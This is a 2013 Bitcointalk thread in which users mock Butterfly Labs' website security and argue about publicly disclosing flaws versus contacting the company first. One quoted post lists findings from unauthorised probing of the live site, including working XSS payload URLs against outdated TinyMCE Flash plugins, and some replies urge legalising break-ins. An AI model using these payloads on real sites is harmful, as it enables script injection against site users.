Pages:
Author

Topic: BFL's site is incredibly amateur... (Read 2893 times)

legendary
Activity: 2576
Merit: 1087
May 15, 2013, 08:12:27 AM
#22
sense disagree with mope-pr. ALERT! seek clarification?

are you saying its good practice to out people's security vulnerabilities without contacting them first?

I can appreciate the theoretical outlook you're coming from. Here's what happens when you try to contact idiots first: http://www.google.com/search?q=bitdaytrade+reddit

Look through the posts there, you have actually competent people trying to talk the guy into safety and some strutting imbecile puffing a lot of smoke about the imaginary experts he's hired, the imaginary expertise he has and on and on.

Thus I can certainly appreciate the practical outlook of warning the community first. I guess in the end it all comes down to a judgement call. Did the OP think the failed site is administered by sane people likely to take appropiate measures in a timely and effective manner, or did the OP think the failed site is a scam run by patent liars (Vleisides, Zerlan etc)?

Yes I certainly agree its a tough call between protecting the innocent, and tarring and feathering incompetent admins into taking action.

I think the way that guy did it was better, "you register, ill show you I can get your pw hash" a good mix of publicly outing them, without actually posting the vulnerability itself letter by letter.

(also sorry for MPOE typo on my previous post... autocorrect :/  )

Maybe my opinion is coloured by me having an outstanding order with BFL, but I'm still giving them the benefit of the doubt, in that I understand what they are doing is hard. Maybe that makes me a sucker, time will tell, and if I do lose that money well that will be another one to chalk up to experience. I'm not so naive as to think that every btc 'investment' I make is gonna pay out. Anyway I think thats a different subject!

Me I'd have contacted them at first, and *then* when they didn't do anything start escalating.
legendary
Activity: 1918
Merit: 1570
Bitcoin: An Idea Worth Spending
May 12, 2013, 12:25:59 PM
#21
Quote
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.

The guy claims to do everything, but denies being the Project Manager, even though BFL doesn't officially have one, with him being the COO taking up that role.

I fed your chicken, Jody.
Sonny, I let the gardener go home early, therefore I'll finish planting the flowers.
I'll get that pallet, Dave.
This is the way we mop the floors, mop the floors, mop the floors...
"Cocksucker!" I love answering the emails.
"Any questions, folks, before we end the daily tour at BFL?"
"Acme Components? Yes, we would like to double our order. Make that 40 resisters, 10 power packs..."
So many anniversaries this month, luckily they have me in charge of the party supplies.
"Therefore, Bob, if you cancel your order, you'll lose your place in the queue. Do you really want to cancel, for we is about to ship. Honest Abe! Fine, and for not canceling we're sending you a 10% off coupon to offset the next price increase." Click! "Fuckin' cocksucker!"
Note to self: Make sure there's no known anomalies on the website today.
"One, two, three, four, five... I love counting fans in the warehouse."
Shoutbox: I confirm that bet.
Twitter: I AND BFL confirm our bets.
BT: It's a bet.
BFL Forum: That is why we bet...
Bum on the street: Sorry, bud. I gave my last real money at CES to some dude with a camera.
All my bags are pack, and I'm on the road again, (different song-->) https://www.youtube.com/watch?v=-cfc3rCQOuU
legendary
Activity: 2492
Merit: 1491
LEALANA Bitcoin Grim Reaper
May 12, 2013, 04:07:56 AM
#20
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.



Everything? Oh you mean like those half-assed updates that have no substance? Rrrrright lol

Dont make me laugh Joshy-boy.
hero member
Activity: 756
Merit: 522
May 11, 2013, 07:27:01 AM
#19
sense disagree with mope-pr. ALERT! seek clarification?

are you saying its good practice to out people's security vulnerabilities without contacting them first?

I can appreciate the theoretical outlook you're coming from. Here's what happens when you try to contact idiots first: http://www.google.com/search?q=bitdaytrade+reddit

Look through the posts there, you have actually competent people trying to talk the guy into safety and some strutting imbecile puffing a lot of smoke about the imaginary experts he's hired, the imaginary expertise he has and on and on.

Thus I can certainly appreciate the practical outlook of warning the community first. I guess in the end it all comes down to a judgement call. Did the OP think the failed site is administered by sane people likely to take appropiate measures in a timely and effective manner, or did the OP think the failed site is a scam run by patent liars (Vleisides, Zerlan etc)?
legendary
Activity: 1918
Merit: 1570
Bitcoin: An Idea Worth Spending
May 11, 2013, 12:41:45 AM
#18
Here's something interesting: http://webcache.googleusercontent.com/search?q=cache:V2NAhB0iUlwJ:butterflylabs.com/images/users/000/003/366/066/imageGallery/+&cd=2&hl=en&ct=clnk&gl=us

Quote
FAA Letter-Approval0001.jpg     06-Apr-2012 02:15    31K

I only know of one pilot associated with Butterfly Labs, and that person wouldn't have had access to BFL's computer at that time because https://bitcointalksearch.org/topic/m.1071218

It's a shame that image is no longer available. Or is it?
legendary
Activity: 2576
Merit: 1087
May 10, 2013, 08:00:25 PM
#17
sense disagree with mope-pr. ALERT! seek clarification?

are you saying its good practice to out people's security vulnerabilities without contacting them first?
hero member
Activity: 482
Merit: 502
May 03, 2013, 07:05:09 PM
#16
At first I wanted to mention Aaron Swartz as counter argument, but realized that MPOE-PR is right. Mostly shithole noncountries like Iran, USA or China are affected Smiley
edit: to be a little positive +1 for Inaba's reaction.
hero member
Activity: 756
Merit: 522
May 03, 2013, 06:56:45 PM
#15
So, after seeing this last night about them leaking their own database login (http://www.reddit.com/r/Bitcoin/comments/1didas/is_butterfly_labs_sql_password_adminbtl123/), I decided to have some fun and poke around the site.

Just for fun, here's what I found:

- Directory Listing Enabled
-- Interesting directories:
--- http://www.butterflylabs.com/upload/
--- http://www.butterflylabs.com/images -
--- http://www.butterflylabs.com/images/users/ <-- What the hell is this stuff? Personal files and photos?
- 2 vulnerable tiny_mce plugins (both vulnerabilities have been fixed for ages, they haven't updated)
-- archiv and it's swfupload XSS. There's 2 seperate XSS' here, using 2 different parameters.
--- using movieName:
Code:
www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(%22stay%20classy%20BFL%22);//
--- using buttonText:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/archiv/swf/swfupload.swf?buttonText=.%3Cimg%20src='http://www.cabelas.com/assets/product_files/image/xss_reel.gif'%3E
-- media plugin uses vulnerable moxieplayer.swf:
Code:
http://www.butterflylabs.com/js/tiny_mce/plugins/media/moxieplayer.swf?url=http://198.12.67.18/tears.flv
- Their site was copied from Webspawner.
-- Some proof: http://butterflylabs.com/images//admin/admin_logo.png - http://www.webspawner.com/admin/login
-- Admin login page: http://butterflylabs.com/admin

Don't trust a company this amateur.

EDIT: Congratulations on the fast fixes. Now disable directory listing @ https://support.butterflylabs.com/
EDIT 2: Everything's fixed. Stay on your toes BFL... I'm not done Wink

Pretty lulzy stuff.

Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Yeah, right. In you know...Iran. Or whatever other shithole noncountry.
legendary
Activity: 2576
Merit: 1087
May 03, 2013, 04:39:52 PM
#14
You posted it because you wanted to flex your e-peen.

I'm sure everyone is glad that you decided there time was best spent fixing this.
sr. member
Activity: 350
Merit: 250
May 03, 2013, 03:40:23 PM
#13
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.


At least you guys responded to this quick and got it fixed. There was a lot more that could have been done with malicious intent.
legendary
Activity: 994
Merit: 1000
May 03, 2013, 01:12:43 PM
#12
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.

Say what you will about Josh's usual responses, but this IMO was the perfect reaction to this situation.

Crack the whip!
legendary
Activity: 1260
Merit: 1000
May 03, 2013, 10:49:24 AM
#11
I agree, it's the responsibility of the designer/programmer.  I am displeased with this and will be investigating it going forward.  Sometimes it feels like I have to do everything myself.

legendary
Activity: 1834
Merit: 1094
Learning the troll avoidance button :)
May 03, 2013, 03:39:02 AM
#10
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something especially a website. Sometimes I think that all that some programmers think while they are coding is that it has to work during their 10sec testing and if someone breaks into their system they say: "It wasn't my fault it's always these evil hackers who have nothing better to do than destroying my hard work".
Breaking into systems and therefore exposing ppl to the laugh of the public must be legalized to improve security. There are way to many amateurs running big projects. We need a way to legally knock them out.
Well said.
Agreed hackers like exploring architecture and systems its a natural instinct and curiosity just make a good defense so we can learn Smiley
Sides we always say evil hackers we mean evil crackers lol (Evil soda crackers Smiley since they are the new overlords XD
sr. member
Activity: 350
Merit: 250
May 03, 2013, 02:36:16 AM
#9
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something especially a website. Sometimes I think that all that some programmers think while they are coding is that it has to work during their 10sec testing and if someone breaks into their system they say: "It wasn't my fault it's always these evil hackers who have nothing better to do than destroying my hard work".
Breaking into systems and therefore exposing ppl to the laugh of the public must be legalized to improve security. There are way to many amateurs running big projects. We need a way to legally knock them out.
Well said.
member
Activity: 85
Merit: 10
May 03, 2013, 02:24:59 AM
#8
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.

Which is ridiculous. We need people to focus on security if they are coding something especially a website. Sometimes I think that all that some programmers think while they are coding is that it has to work during their 10sec testing and if someone breaks into their system they say: "It wasn't my fault it's always these evil hackers who have nothing better to do than destroying my hard work".
Breaking into systems and therefore exposing ppl to the laugh of the public must be legalized to improve security. There are way to many amateurs running big projects. We need a way to legally knock them out.
legendary
Activity: 1834
Merit: 1094
Learning the troll avoidance button :)
May 02, 2013, 10:17:56 PM
#7
Not the right directory I believe
sr. member
Activity: 287
Merit: 250
May 02, 2013, 10:12:22 PM
#6
While, it's good of you to alert people. I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.
The fastest way to get anything fixed is public outing.
It's fine and dandy to believe that, except by outing this, you've put other people's information at risk. Let's say somebody does get into BFL's systems, what kind of information do you think they have stored on their servers? Information that somebody who has a vendetta against bitcoin could put to good use, such as the mailing addresses of tens of thousands of people. Not to mention any related payment information.
legendary
Activity: 1834
Merit: 1094
Learning the troll avoidance button :)
May 02, 2013, 10:11:20 PM
#5
That's weak coding nice infiltration do that myself sometimes
http://www.butterflylabs.com/images/admin/butterfly-admin.jpg
sr. member
Activity: 350
Merit: 250
May 02, 2013, 10:03:18 PM
#4
While, it's good of you to alert people. I think you should have alerted them instead of publicly outing their exploits as soon as you found them.

But hey, if your tactic is to get professional penetrators to cause a stir, more power to ya. I just wouldn't have done it this way.
The fastest way to get anything fixed is public outing.
sr. member
Activity: 606
Merit: 273
May 02, 2013, 09:31:04 PM
#3
Agree with mustyoshi. People go to jail for a *long* time for doing what n4ru just did.
Pages:
Jump to: